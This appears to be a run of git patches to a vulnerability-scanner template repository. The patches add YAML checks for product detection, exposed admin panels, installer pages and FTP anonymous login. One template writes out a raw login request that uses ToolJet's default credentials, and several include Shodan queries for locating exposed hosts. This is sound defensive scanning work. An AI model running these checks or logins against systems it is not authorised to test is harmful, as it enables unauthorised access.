metadata: verified: true google-dork: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php - tags: cve,cve2022,wp,wordpress,wp-plugin,xss,wpb-show-core + tags: wp-plugin,xss,wpb-show-core,wpscan,cve,cve2022,wp,wordpress requests: - method: GET From efff0b58fbe13a1040fda1420f2f3d85a087d710 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 16 Nov 2022 19:27:35 +0530 Subject: [PATCH 0354/1415] Update ftp-anonymous-login.yaml --- network/ftp-anonymous-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/network/ftp-anonymous-login.yaml b/network/ftp-anonymous-login.yaml index c4dfcdbf08..05f322ad13 100644 --- a/network/ftp-anonymous-login.yaml +++ b/network/ftp-anonymous-login.yaml @@ -23,6 +23,7 @@ network: matchers: - type: word + part: raw words: - "Anonymous access allowed," - "Logged in anonymously" From 5394e3c0bbe79e12964c0f14e5d55bd0851b79b3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 16 Nov 2022 19:47:10 +0530 Subject: [PATCH 0356/1415] Update sogo-detect.yaml --- technologies/sogo-detect.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/technologies/sogo-detect.yaml b/technologies/sogo-detect.yaml index 4c4526d53b..d134165b8d 100644 --- a/technologies/sogo-detect.yaml +++ b/technologies/sogo-detect.yaml @@ -16,7 +16,9 @@ requests: - method: GET path: - "{{BaseURL}}" + - "{{BaseURL}}/SOGo" + stop-at-first-match: true host-redirects: true max-redirects: 2 matchers-condition: and @@ -24,8 +26,8 @@ requests: - type: word part: body words: - - 'SOGo' - - 'SOGo Web Interface' + - 'content="SOGo Web Interface"' + - 'sg-default="SOGo' condition: or - type: status From da01cdd40b0fba0abfdec33f719033601ec69bb2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 16 Nov 2022 14:19:13 +0000 Subject: [PATCH 0357/1415] Auto Generated New Template Addition List [Wed Nov 16 14:19:13 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index bd732faebd..e92ff22336 100644 --- a/.new-additions +++ b/.new-additions @@ -19,5 +19,6 @@ network/detection/esmtp-detect.yaml network/detection/imap-detect.yaml network/detection/pop3-detect.yaml network/detection/telnet-detect.yaml +technologies/sogo-detect.yaml technologies/tornado-server-login.yaml vulnerabilities/opencpu/opencpu-rce.yaml From afbfd5c7bd0a4cd9f62410dfc11373aab8ef77f8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 16 Nov 2022 21:05:00 +0530 Subject: [PATCH 0358/1415] Update wordpress-detect.yaml --- technologies/wordpress-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/technologies/wordpress-detect.yaml b/technologies/wordpress-detect.yaml index 4845f91a75..4bb4ab4ff9 100644 --- a/technologies/wordpress-detect.yaml +++ b/technologies/wordpress-detect.yaml @@ -13,10 +13,11 @@ requests: - method: GET path: - "{{BaseURL}}" + - "{{BaseURL}}/wp-admin/install.php" - "{{BaseURL}}/feed/" - "{{BaseURL}}/?feed=rss2" # alternative if /feed/ is blocked - stop-at-first-match: true + stop-at-first-match: true matchers-condition: and matchers: - type: regex From 049f97dba9804db480685e3b3c2a20b8b879e97e Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Wed, 16 Nov 2022 12:21:28 -0500 Subject: [PATCH 0359/1415] Create notion-detect.yaml --- technologies/notion-detect.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 technologies/notion-detect.yaml diff --git a/technologies/notion-detect.yaml b/technologies/notion-detect.yaml new file mode 100644 index 0000000000..454ec124d4 --- /dev/null +++ b/technologies/notion-detect.yaml @@ -0,0 +1,28 @@ +id: notion-detect + +info: + name: Notion detect + author: tess + severity: info + metadata: + verified: true + shodan-query: title:"Notion – One workspace. Every team." + tags: notion,detect + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Notion – One workspace. Every team." + - "Notion Labs, Inc." + condition: and + + - type: status + status: + - 200 From 6649d4283bff9742b1691832c9eae429472bddf9 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Wed, 16 Nov 2022 13:45:48 -0500 Subject: [PATCH 0360/1415] Create bootstrap-admin-panel.yaml --- misconfiguration/bootstrap-admin-panel.yaml | 28 +++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/bootstrap-admin-panel.yaml diff --git a/misconfiguration/bootstrap-admin-panel.yaml b/misconfiguration/bootstrap-admin-panel.yaml new file mode 100644 index 0000000000..a7781bb687 --- /dev/null +++ b/misconfiguration/bootstrap-admin-panel.yaml @@ -0,0 +1,28 @@ +id: bootstrap-admin-panel + +info: + name: Bootstrap Admin Template + author: tess + severity: low + metadata: + verified: true + shodan-query: title:"Dashboard - Bootstrap Admin Template" + tags: bootstrap,panel,misconfig,exposure + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Dashboard - Bootstrap Admin Template" + - "Bootstrap Responsive Admin Template" + condition: and + + - type: status + status: + - 200 From f3e62c17800678341b26a5f14df1691a49069fc2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 17 Nov 2022 00:31:29 +0530 Subject: [PATCH 0361/1415] Create tasmota-config-webui.yaml --- misconfiguration/tasmota-config-webui.yaml | 42 ++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 misconfiguration/tasmota-config-webui.yaml diff --git a/misconfiguration/tasmota-config-webui.yaml b/misconfiguration/tasmota-config-webui.yaml new file mode 100644 index 0000000000..bcfa69d0d7 --- /dev/null +++ b/misconfiguration/tasmota-config-webui.yaml @@ -0,0 +1,42 @@ +id: tasmota-config-webui + +info: + name: Tasmota Configuration Exposure + author: ritikchaddha + severity: medium + reference: + - https://github.com/arendst/Tasmota + metadata: + verified: true + shodan-query: title:"Tasmota" + tags: config,tasmota,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: or + matchers: + - type: word + part: body + words: + - "Firmware" + - "Tasmota" + condition: and + case-insensitive: true + + - type: word + part: body + words: + - "Theo Arends" + - "

Tasmota

" + condition: and + case-insensitive: true + + extractors: + - type: regex + part: body + group: 1 + regex: + - "Tasmota ([0-9.]+) " From bffb320ef37fa9484b03f735930de3db2c9fab53 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 17 Nov 2022 00:34:41 +0530 Subject: [PATCH 0362/1415] Update tasmota-config-webui.yaml --- misconfiguration/tasmota-config-webui.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/tasmota-config-webui.yaml b/misconfiguration/tasmota-config-webui.yaml index bcfa69d0d7..8c3fab4830 100644 --- a/misconfiguration/tasmota-config-webui.yaml +++ b/misconfiguration/tasmota-config-webui.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true shodan-query: title:"Tasmota" - tags: config,tasmota,exposure + tags: misconfig,tasmota,exposure,config requests: - method: GET From 29e3dca83e8474669e51719f5b91fd18d7d645c6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 16 Nov 2022 19:06:25 +0000 Subject: [PATCH 0363/1415] Auto Generated New Template Addition List [Wed Nov 16 19:06:25 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e92ff22336..cda2ab16c0 100644 --- a/.new-additions +++ b/.new-additions @@ -13,6 +13,7 @@ exposed-panels/tekton-dashboard.yaml exposed-panels/xibocms-login.yaml iot/pqube-power-analyzers.yaml misconfiguration/docmosis-tornado-server.yaml +misconfiguration/tasmota-config-webui.yaml misconfiguration/typo3-debug-mode.yaml network/detection/dotnet-remoting-service-detect.yaml network/detection/esmtp-detect.yaml From 844c8294103b5cc879a022b541c2276d45606f45 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 17 Nov 2022 00:42:10 +0530 Subject: [PATCH 0364/1415] Create tasmota-install.yaml --- .../installer/tasmota-install.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/installer/tasmota-install.yaml diff --git a/misconfiguration/installer/tasmota-install.yaml b/misconfiguration/installer/tasmota-install.yaml new file mode 100644 index 0000000000..913e8b72bd --- /dev/null +++ b/misconfiguration/installer/tasmota-install.yaml @@ -0,0 +1,28 @@ +id: tasmota-install + +info: + name: Tasmota Installer Exposure + author: ritikchaddha + severity: high + metadata: + verified: true + shodan-query: title:"Tasmota" + tags: misconfig,tasmota,install,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/install/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Install Tasmota" + - "Tasmota Installer" + condition: or + + - type: status + status: + - 200 From 42230110cdc97d35d8c3ecea94f3f3f0320f1421 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 16 Nov 2022 19:20:15 +0000 Subject: [PATCH 0365/1415] Auto Generated New Template Addition List [Wed Nov 16 19:20:14 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cda2ab16c0..e2f1d36307 100644 --- a/.new-additions +++ b/.new-additions @@ -13,6 +13,7 @@ exposed-panels/tekton-dashboard.yaml exposed-panels/xibocms-login.yaml iot/pqube-power-analyzers.yaml misconfiguration/docmosis-tornado-server.yaml +misconfiguration/installer/tasmota-install.yaml misconfiguration/tasmota-config-webui.yaml misconfiguration/typo3-debug-mode.yaml network/detection/dotnet-remoting-service-detect.yaml From 3b7facc7a3224d559b058a6fcede8c156405f275 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 17 Nov 2022 02:02:37 +0530 Subject: [PATCH 0366/1415] Create tooljet-default-login.yaml --- .../tooljet/tooljet-default-login.yaml | 54 +++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 default-logins/tooljet/tooljet-default-login.yaml diff --git a/default-logins/tooljet/tooljet-default-login.yaml b/default-logins/tooljet/tooljet-default-login.yaml new file mode 100644 index 0000000000..d0c6f45f4a --- /dev/null +++ b/default-logins/tooljet/tooljet-default-login.yaml @@ -0,0 +1,54 @@ +id: tooljet-default-login + +info: + name: ToolJet Default Login Credential + author: random-robbie + severity: high + description: | + toolJet is an open-source low-code framework to build and deploy custom internal tools. ToolJet can connect to your data sources such as databases ( PostgreSQL, MongoDB, MS SQL Server, Snowflake, , BigQuery, etc ), API/GraphQL endpoints, SaaS tools ( Airtable, Stripe, Google Sheets, etc ) and cloud object storage services ( AWS S3, Google Cloud Storage and Minio ) + reference: + - https://docs.tooljet.com/docs/contributing-guide/setup/docker/ + metadata: + verified: true + shodan-query: title:"tooljet" + tags: default-login,tooljet + +requests: + - raw: + - |- + POST /api/authenticate HTTP/2 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0 + Accept: */* + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Referer: {{BaseURL}}/login?redirectTo=/ + Content-Type: application/json + Origin: {{BaseURL}} + + {"email":"{{username}}","password":"{{password}}"} + + attack: pitchfork + payloads: + username: + - dev@tooljet.io + password: + - password + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"auth_token":' + - '"org_environment_variable_delete":' + condition: and + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 201 From ce0d295001bd74b6ed584716efc6787f013ddb5a Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Wed, 16 Nov 2022 15:51:37 -0500 Subject: [PATCH 0367/1415] Update bootstrap-admin-panel.yaml --- misconfiguration/bootstrap-admin-panel.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/misconfiguration/bootstrap-admin-panel.yaml b/misconfiguration/bootstrap-admin-panel.yaml index a7781bb687..9fd19c388c 100644 --- a/misconfiguration/bootstrap-admin-panel.yaml +++ b/misconfiguration/bootstrap-admin-panel.yaml @@ -3,7 +3,7 @@ id: bootstrap-admin-panel info: name: Bootstrap Admin Template author: tess - severity: low + severity: info metadata: verified: true shodan-query: title:"Dashboard - Bootstrap Admin Template" @@ -14,7 +14,7 @@ requests: path: - '{{BaseURL}}' - matchers-condition: and + matchers-condition: or matchers: - type: word part: body @@ -23,6 +23,8 @@ requests: - "Bootstrap Responsive Admin Template" condition: and - - type: status - status: - - 200 + - type: word + part: body + words: + - "Bootstrap Admin Template" + condition: and From 7f6998b680ab013a9fd25d198027cc06cda0fc76 Mon Sep 17 00:00:00 2001 From: Kishore Hariram <36239971+kishore-hariram@users.noreply.github.com> Date: Wed, 16 Nov 2022 22:08:40 +0000 Subject: [PATCH 0368/1415] Added new template to detect the Wagtail CMS I have added the template to detect the Wagtail CMS --- technologies/wagtail-cms-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/wagtail-cms-detect.yaml diff --git a/technologies/wagtail-cms-detect.yaml b/technologies/wagtail-cms-detect.yaml new file mode 100644 index 0000000000..f76c237e28 --- /dev/null +++ b/technologies/wagtail-cms-detect.yaml @@ -0,0 +1,24 @@ +id: wagtail-web-console-detect + +info: + name: Wagtail web console Detection Template + author: kishore-hariram + severity: info + tags: tech,wagtail + +requests: + - method: GET + path: + - "{{BaseURL}}/login/?next=/" + - "{{BaseURL}}/admin/login/?next=/admin/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Wagtail" + + - type: status + status: + - 200 \ No newline at end of file From 8bd9322b94096777595505a71b9bb0f8bcb29805 Mon Sep 17 00:00:00 2001 From: Kishore Hariram <36239971+kishore-hariram@users.noreply.github.com> Date: Wed, 16 Nov 2022 22:37:13 +0000 Subject: [PATCH 0369/1415] Added template to detect the Mezzanine CMS Hi there, I have added the Mezzanine CMS detection template. --- technologies/mezzanine-cms-detect.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 technologies/mezzanine-cms-detect.yaml diff --git a/technologies/mezzanine-cms-detect.yaml b/technologies/mezzanine-cms-detect.yaml new file mode 100644 index 0000000000..c4d637dfb5 --- /dev/null +++ b/technologies/mezzanine-cms-detect.yaml @@ -0,0 +1,23 @@ +id: mezzanine-cms-detect + +info: + name: mezzanine web console detection + author: kishore-hariram + severity: info + tags: tech,mezzanine + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: + matchers: + - type: word + words: + - "| Mezzanine" + + - type: status + status: + - 200 + From 67611d93ae58bc8c94082e3fbc3b3ad2bb5e2076 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Wed, 16 Nov 2022 18:44:42 -0500 Subject: [PATCH 0370/1415] Create phpMemcachedAdmin-panel.yaml --- exposed-panels/phpMemcachedAdmin-panel.yaml | 34 +++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 exposed-panels/phpMemcachedAdmin-panel.yaml diff --git a/exposed-panels/phpMemcachedAdmin-panel.yaml b/exposed-panels/phpMemcachedAdmin-panel.yaml new file mode 100644 index 0000000000..49f9ee652e --- /dev/null +++ b/exposed-panels/phpMemcachedAdmin-panel.yaml @@ -0,0 +1,34 @@ +id: phpMemcachedAdmin-panel + +info: + name: phpMemcachedAdmin Panel + author: tess + severity: high + metadata: + verified: true + shodan-query: title:"phpMemcachedAdmin 1.2.2" + tags: memcached,php,panel,exposure + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "phpMemcachedAdmin 1.2.2" + - "Execute Commands on Servers" + - "Edit Configuration" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 478db30e9fb8c0ede4c2535562d53f52e0c677bf Mon Sep 17 00:00:00 2001 From: Y4er <45418382@qq.com> Date: Thu, 17 Nov 2022 14:25:13 +0800 Subject: [PATCH 0371/1415] Update wuzhicms-sqli.yaml fix bug --- vulnerabilities/other/wuzhicms-sqli.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/wuzhicms-sqli.yaml b/vulnerabilities/other/wuzhicms-sqli.yaml index c0628e4726..ac6f1c1c63 100644 --- a/vulnerabilities/other/wuzhicms-sqli.yaml +++ b/vulnerabilities/other/wuzhicms-sqli.yaml @@ -26,7 +26,7 @@ requests: matchers: - type: word words: - - '{{md5({{num}})}}' + - 'c8c605999f3d8352d7bb792cf3fdb25' part: body - type: status From e7912a8f057701bd89a1bf6234d4eee3dd5c0229 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 17 Nov 2022 12:39:51 +0530 Subject: [PATCH 0372/1415] Update and rename phpMemcachedAdmin-panel.yaml to phpmemcached-admin-panel.yaml --- ...nel.yaml => phpmemcached-admin-panel.yaml} | 24 +++++++++---------- 1 file changed, 11 insertions(+), 13 deletions(-) rename exposed-panels/{phpMemcachedAdmin-panel.yaml => phpmemcached-admin-panel.yaml} (52%) diff --git a/exposed-panels/phpMemcachedAdmin-panel.yaml b/exposed-panels/phpmemcached-admin-panel.yaml similarity index 52% rename from exposed-panels/phpMemcachedAdmin-panel.yaml rename to exposed-panels/phpmemcached-admin-panel.yaml index 49f9ee652e..444e240b22 100644 --- a/exposed-panels/phpMemcachedAdmin-panel.yaml +++ b/exposed-panels/phpmemcached-admin-panel.yaml @@ -1,13 +1,13 @@ -id: phpMemcachedAdmin-panel +id: phpmemcached-admin-panel info: name: phpMemcachedAdmin Panel author: tess - severity: high + severity: medium metadata: verified: true - shodan-query: title:"phpMemcachedAdmin 1.2.2" - tags: memcached,php,panel,exposure + shodan-query: title:"phpMemcachedAdmin" + tags: panel,phpmemcached,exposure requests: - method: GET @@ -19,16 +19,14 @@ requests: - type: word part: body words: - - "phpMemcachedAdmin 1.2.2" + - "phpMemcachedAdmin" - "Execute Commands on Servers" - "Edit Configuration" condition: and - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - "phpMemcachedAdmin ([0-9.]+)" From 1afa3095035f6c2b9fb5a3f8146f910e847f4eef Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 17 Nov 2022 12:45:55 +0530 Subject: [PATCH 0373/1415] Update phpmemcached-admin-panel.yaml --- exposed-panels/phpmemcached-admin-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/phpmemcached-admin-panel.yaml b/exposed-panels/phpmemcached-admin-panel.yaml index 444e240b22..47872820fb 100644 --- a/exposed-panels/phpmemcached-admin-panel.yaml +++ b/exposed-panels/phpmemcached-admin-panel.yaml @@ -21,8 +21,8 @@ requests: words: - "phpMemcachedAdmin" - "Execute Commands on Servers" - - "Edit Configuration" condition: and + case-insensitive: true extractors: - type: regex From 236bbced4b1323d0fb956f0d5ada65578c0ac1ce Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 17 Nov 2022 12:55:07 +0530 Subject: [PATCH 0374/1415] Update and rename exposed-panels/phpmemcached-admin-panel.yaml to misconfiguration/phpmemcached-admin-panel.yaml --- .../phpmemcached-admin-panel.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {exposed-panels => misconfiguration}/phpmemcached-admin-panel.yaml (100%) diff --git a/exposed-panels/phpmemcached-admin-panel.yaml b/misconfiguration/phpmemcached-admin-panel.yaml similarity index 100% rename from exposed-panels/phpmemcached-admin-panel.yaml rename to misconfiguration/phpmemcached-admin-panel.yaml From 264b62e651d426bac9935655c246427194c96086 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 17 Nov 2022 12:55:49 +0530 Subject: [PATCH 0375/1415] Update phpmemcached-admin-panel.yaml --- misconfiguration/phpmemcached-admin-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/phpmemcached-admin-panel.yaml b/misconfiguration/phpmemcached-admin-panel.yaml index 47872820fb..270dbd2382 100644 --- a/misconfiguration/phpmemcached-admin-panel.yaml +++ b/misconfiguration/phpmemcached-admin-panel.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: title:"phpMemcachedAdmin" - tags: panel,phpmemcached,exposure + tags: phpmemcached,exposure,misconfig requests: - method: GET From f66fb5d5ed975bed8a0a99dfdcf6251b24597ec7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 17 Nov 2022 07:28:26 +0000 Subject: [PATCH 0376/1415] Auto Generated New Template Addition List [Thu Nov 17 07:28:26 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e2f1d36307..7866dca733 100644 --- a/.new-additions +++ b/.new-additions @@ -14,6 +14,7 @@ exposed-panels/xibocms-login.yaml iot/pqube-power-analyzers.yaml misconfiguration/docmosis-tornado-server.yaml misconfiguration/installer/tasmota-install.yaml +misconfiguration/phpmemcached-admin-panel.yaml misconfiguration/tasmota-config-webui.yaml misconfiguration/typo3-debug-mode.yaml network/detection/dotnet-remoting-service-detect.yaml From 676b832e864679fdefc6c424d16c0fa7ca3918df Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 17 Nov 2022 13:00:10 +0530 Subject: [PATCH 0378/1415] Update phpmemcached-admin-panel.yaml --- misconfiguration/phpmemcached-admin-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/phpmemcached-admin-panel.yaml b/misconfiguration/phpmemcached-admin-panel.yaml index 270dbd2382..3528b2f02f 100644 --- a/misconfiguration/phpmemcached-admin-panel.yaml +++ b/misconfiguration/phpmemcached-admin-panel.yaml @@ -29,4 +29,4 @@ requests: part: body group: 1 regex: - - "phpMemcachedAdmin ([0-9.]+)" + - "MemcachedAdmin ([0-9.]+)" From 7ead2df3a0d57e8d08fef83add8ae7481c00054f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 17 Nov 2022 13:15:10 +0530 Subject: [PATCH 0380/1415] Create apache-licenserc.yaml --- exposures/files/apache-licenserc.yaml | 28 +++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposures/files/apache-licenserc.yaml diff --git a/exposures/files/apache-licenserc.yaml b/exposures/files/apache-licenserc.yaml new file mode 100644 index 0000000000..3f12647478 --- /dev/null +++ b/exposures/files/apache-licenserc.yaml @@ -0,0 +1,28 @@ +id: apache-licenserc + +info: + name: Apache .licenserc.yaml + author: DhiyaneshDk + severity: low + metadata: + verified: true + tags: exposure,file,apache + +requests: + - method: GET + path: + - '{{BaseURL}}/.licenserc.yaml' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'header:' + - 'license:' + - 'copyright-owner:' + condition: and + + - type: status + status: + - 200 From fdcda8f5ea486e9660000d638c1cc3d4325a2d99 Mon Sep 17 00:00:00 2001 From: Kishore Hariram <36239971+kishore-hariram@users.noreply.github.com> Date: Thu, 17 Nov 2022 07:49:23 +0000 Subject: [PATCH 0381/1415] Delete mezzanine-cms-detect.yaml --- technologies/mezzanine-cms-detect.yaml | 23 ----------------------- 1 file changed, 23 deletions(-) delete mode 100644 technologies/mezzanine-cms-detect.yaml diff --git a/technologies/mezzanine-cms-detect.yaml b/technologies/mezzanine-cms-detect.yaml deleted file mode 100644 index c4d637dfb5..0000000000 --- a/technologies/mezzanine-cms-detect.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: mezzanine-cms-detect - -info: - name: mezzanine web console detection - author: kishore-hariram - severity: info - tags: tech,mezzanine - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: - matchers: - - type: word - words: - - "| Mezzanine" - - - type: status - status: - - 200 - From 2055ce58042837589157df62211d25c5053a667a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 17 Nov 2022 13:30:30 +0530 Subject: [PATCH 0382/1415] Update wagtail-cms-detect.yaml --- technologies/wagtail-cms-detect.yaml | 16 ++++++++++------ 1 file changed, 10 insertions(+), 6 deletions(-) diff --git a/technologies/wagtail-cms-detect.yaml b/technologies/wagtail-cms-detect.yaml index f76c237e28..aeb6f1a9b3 100644 --- a/technologies/wagtail-cms-detect.yaml +++ b/technologies/wagtail-cms-detect.yaml @@ -1,24 +1,28 @@ -id: wagtail-web-console-detect +id: wagtail-login info: - name: Wagtail web console Detection Template + name: Wagtail Login - Detect author: kishore-hariram severity: info - tags: tech,wagtail + metadata: + verified: true + shodan-query: title:"Wagtail - Sign in" + tags: panel,wagtail requests: - method: GET path: - "{{BaseURL}}/login/?next=/" - "{{BaseURL}}/admin/login/?next=/admin/" - + stop-at-first-match: true + matchers-condition: and matchers: - type: word part: body words: - - "Wagtail" + - "Wagtail - Sign in" - type: status status: - - 200 \ No newline at end of file + - 200 From a049f5bf91d9a3de8d2e7e8e20e7d3f5d916aaa6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 17 Nov 2022 13:33:28 +0530 Subject: [PATCH 0383/1415] Update wagtail-cms-detect.yaml --- technologies/wagtail-cms-detect.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/technologies/wagtail-cms-detect.yaml b/technologies/wagtail-cms-detect.yaml index aeb6f1a9b3..cb2c13b095 100644 --- a/technologies/wagtail-cms-detect.yaml +++ b/technologies/wagtail-cms-detect.yaml @@ -15,14 +15,13 @@ requests: - "{{BaseURL}}/login/?next=/" - "{{BaseURL}}/admin/login/?next=/admin/" stop-at-first-match: true - matchers-condition: and - matchers: + matchers: - type: word part: body - words: + words: - "Wagtail - Sign in" - type: status - status: - - 200 + status: + - 200 From 2e2ea2982f860ac84f42ccc0cefe5402249763c0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 17 Nov 2022 13:33:43 +0530 Subject: [PATCH 0384/1415] Update wagtail-cms-detect.yaml --- technologies/wagtail-cms-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/wagtail-cms-detect.yaml b/technologies/wagtail-cms-detect.yaml index cb2c13b095..a04728c31d 100644 --- a/technologies/wagtail-cms-detect.yaml +++ b/technologies/wagtail-cms-detect.yaml @@ -9,7 +9,7 @@ info: shodan-query: title:"Wagtail - Sign in" tags: panel,wagtail -requests: +requests: - method: GET path: - "{{BaseURL}}/login/?next=/" From 8c9869a0b4038767302eea37f83366268bf99cbf Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 17 Nov 2022 13:36:37 +0530 Subject: [PATCH 0385/1415] Update wagtail-cms-detect.yaml --- technologies/wagtail-cms-detect.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/technologies/wagtail-cms-detect.yaml b/technologies/wagtail-cms-detect.yaml index a04728c31d..43d50dbd37 100644 --- a/technologies/wagtail-cms-detect.yaml +++ b/technologies/wagtail-cms-detect.yaml @@ -12,16 +12,17 @@ info: requests: - method: GET path: - - "{{BaseURL}}/login/?next=/" - - "{{BaseURL}}/admin/login/?next=/admin/" + - '{{BaseURL}}/login/?next=/' + - '{{BaseURL}}/admin/login/?next=/admin/' stop-at-first-match: true + matchers-condition: and matchers: - type: word part: body words: - - "Wagtail - Sign in" + - 'Wagtail - Sign in' - - type: status + - type: status status: - 200 From 8c50c806485cfc36aac83def0ffa30436828e9c3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 17 Nov 2022 13:39:12 +0530 Subject: [PATCH 0386/1415] Rename technologies/wagtail-cms-detect.yaml to exposed-panels/wagtail-cms-detect.yaml --- {technologies => exposed-panels}/wagtail-cms-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {technologies => exposed-panels}/wagtail-cms-detect.yaml (100%) diff --git a/technologies/wagtail-cms-detect.yaml b/exposed-panels/wagtail-cms-detect.yaml similarity index 100% rename from technologies/wagtail-cms-detect.yaml rename to exposed-panels/wagtail-cms-detect.yaml From 658730ba77c9d1750d799335be7fae151780ca63 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 17 Nov 2022 08:12:52 +0000 Subject: [PATCH 0387/1415] Auto Generated New Template Addition List [Thu Nov 17 08:12:52 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7866dca733..5b6ec0e867 100644 --- a/.new-additions +++ b/.new-additions @@ -10,6 +10,7 @@ cves/2022/CVE-2022-3484.yaml cves/2022/CVE-2022-3578.yaml exposed-panels/opencpu-panel.yaml exposed-panels/tekton-dashboard.yaml +exposed-panels/wagtail-cms-detect.yaml exposed-panels/xibocms-login.yaml iot/pqube-power-analyzers.yaml misconfiguration/docmosis-tornado-server.yaml From 91762a161bb29e371ed0a837c2b31607d40a7052 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 17 Nov 2022 13:59:30 +0530 Subject: [PATCH 0388/1415] Create hetzner-cloud-detect.yaml --- technologies/hetzner-cloud-detect.yaml | 28 ++++++++++++++++++++++++++ 1 file changed, 28 